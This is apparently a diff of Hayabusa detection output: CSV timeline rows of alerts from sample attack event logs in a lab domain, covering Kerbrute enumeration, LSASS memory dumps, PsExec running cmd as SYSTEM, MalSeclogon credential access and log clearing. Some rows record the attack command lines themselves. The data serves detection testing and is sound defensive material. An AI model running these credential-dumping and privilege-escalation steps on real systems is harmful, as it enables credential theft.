+2021-12-03 21:06:07.047 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_374806bcc65140a5a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:07.052 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_b2a35e76f50a4c23a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:07.056 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_957258b5879242afb | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:11.514 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: hack1 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:11.878 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: hacker2 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:12.553 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: dsrm | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-05 05:59:31.403 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\SYSTEM32\cmd.exe /c ""C:\tools\shell.cmd"" | Path: C:\Windows\System32\cmd.exe | PID: 0x13a4 | User: FS03VULN$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-Task Manager access indicator for potential LSASS dump.evtx
+2021-12-05 06:10:40.723 +09:00,fs03vuln.offsec.lan,11,info,,File Created,Path: C:\Users\admmig\AppData\Local\Temp\lsass (4).DMP | Process: C:\Windows\System32\Taskmgr.exe | PID: 3504 | PGUID: A57649D1-D6B1-61AB-A5E4-D70100000000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via Task Manager.evtx
+2021-12-05 06:10:40.723 +09:00,fs03vuln.offsec.lan,11,high,CredAccess,LSASS Memory Dump File Creation,,../hayabusa-rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via Task Manager.evtx
+2021-12-05 06:10:40.723 +09:00,fs03vuln.offsec.lan,11,high,CredAccess,LSASS Process Memory Dump Files,,../hayabusa-rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via Task Manager.evtx
+2021-12-05 06:19:16.741 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1035,technique_name=Service Execution | Cmd: PsExec64.exe -i -s cmd | Process: C:\TOOLS\PsExec64.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x83ef56 | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000 | Hash: SHA1=FB0A150601470195C47B4E8D87FCB3F50292BEB2,MD5=9321C107D1F7E336CDA550A2BF049108,SHA256=AD6B98C01EE849874E4B4502C3D7853196F6044240D3271E4AB3FC6E3C08E9A4,IMPHASH=159D56D406180A332FBC99290F30700E",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1035,technique_name=Service Execution | SetValue: HKU\S-1-5-21-4230534742-2542757381-3142984815-1111\Software\Sysinternals\PsExec\EulaAccepted: DWORD (0x00000001) | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,11,info,,File Created,Path: C:\Windows\PSEXESVC.exe | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,11,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/file_event/file_event_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,13,low,ResDev,Usage of Sysinternals Tools,,../hayabusa-rules/sigma/registry_event/registry_event_sysinternals_eula_accepted.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.804 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.804 +09:00,fs03vuln.offsec.lan,17,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/pipe_created/pipe_created_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC | Process: System | PID: 4 | PGUID: A57649D1-92D1-61A4-EB03-000000000000",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdin | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,18,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/pipe_created/pipe_created_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdout | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stderr | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdin | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\PSEXESVC.exe | LID: 0x3e7 | PID: 540 | PGUID: A57649D1-DB54-61AB-0467-DC0100000000 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdout | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stderr | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:17.757 +09:00,fs03vuln.offsec.lan,22,info,,DNS Query,Query: fs03vuln | Result: 10.23.42.38; | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000,../hayabusa-rules/hayabusa/sysmon/events/22_DNS-Query.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 07:09:13.666 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8ef8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx
+2021-12-05 07:09:13.671 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8f26,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx
+2021-12-05 07:09:13.672 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8f3e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx
+2021-12-05 07:09:13.673 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8f54,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx
+2021-12-05 07:09:18.652 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x10e6e929b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx
+2021-12-08 02:33:01.409 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: MalSeclogon.exe -p 636 -d 2 | Process: \\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x53ca2 | PID: 8612 | PGUID: 747F3D96-9ACD-61AF-D301-000000000102",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
+2021-12-08 02:33:01.474 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: - | LID: 0x3e7 | PID: 7108 | PGUID: 747F3D96-9ACD-61AF-D401-000000000102,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
+2021-12-08 02:33:01.485 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\svchost.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: NT AUTHORITY\NETWORK SERVICE | Tgt User: NT AUTHORITY\SYSTEM | Access: 0x100000 | Src PID: 884 | Src PGUID: 747F3D96-0BA4-61B0-1200-000000000102 | Tgt PID: 7108 | Tgt PGUID: 747F3D96-9ACD-61AF-D401-000000000102,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
+2021-12-08 02:33:01.616 +09:00,MSEDGEWIN10,4624,info,,Logon Type 9 - NewCredentials,User: IEUser | Computer: - | IP Addr: ::1 | LID: 0x16e3db3 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
+2021-12-08 02:33:01.616 +09:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
+2021-12-08 02:33:01.616 +09:00,MSEDGEWIN10,4624,high,LatMov,Successful Overpass the Hash Attempt,,../hayabusa-rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
+2021-12-08 02:33:01.636 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: MalSeclogon.exe -p 636 -d 2 -l 1 | Process: \\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: - | LID: 0x16e3db3 | PID: 6072 | PGUID: 747F3D96-9ACD-61AF-D501-000000000102,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
+2021-12-08 02:33:01.638 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Tgt Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Src User: MSEDGEWIN10\IEUser | Tgt User: MSEDGEWIN10\IEUser | Access: 0x100000 | Src PID: 8612 | Src PGUID: 747F3D96-9ACD-61AF-D301-000000000102 | Tgt PID: 6072 | Tgt PGUID: 747F3D96-9ACD-61AF-D501-000000000102,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
+2021-12-08 02:33:01.680 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: MSEDGEWIN10\IEUser | Tgt User: NT AUTHORITY\SYSTEM | Access: 0x1410 | Src PID: 6072 | Src PGUID: 747F3D96-9ACD-61AF-D501-000000000102 | Tgt PID: 5268 | Tgt PGUID: 747F3D96-9ACD-61AF-D701-000000000102,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
+2021-12-08 02:33:01.680 +09:00,MSEDGEWIN10,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
+2021-12-08 02:33:01.680 +09:00,MSEDGEWIN10,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,../hayabusa-rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
+2021-12-09 22:41:50.714 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: hack1,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4624-RottenPotatoNG.evtx"
+2021-12-10 03:50:47.980 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:55.333 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d4d5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d4ed,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d4fe,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d51f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d4d5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d4ed,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d4fe,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d51f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:55.958 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:55.958 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:55.958 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:56.005 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:56.052 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2f10a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:56.052 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2f10a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
+2021-12-10 03:50:56.052 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
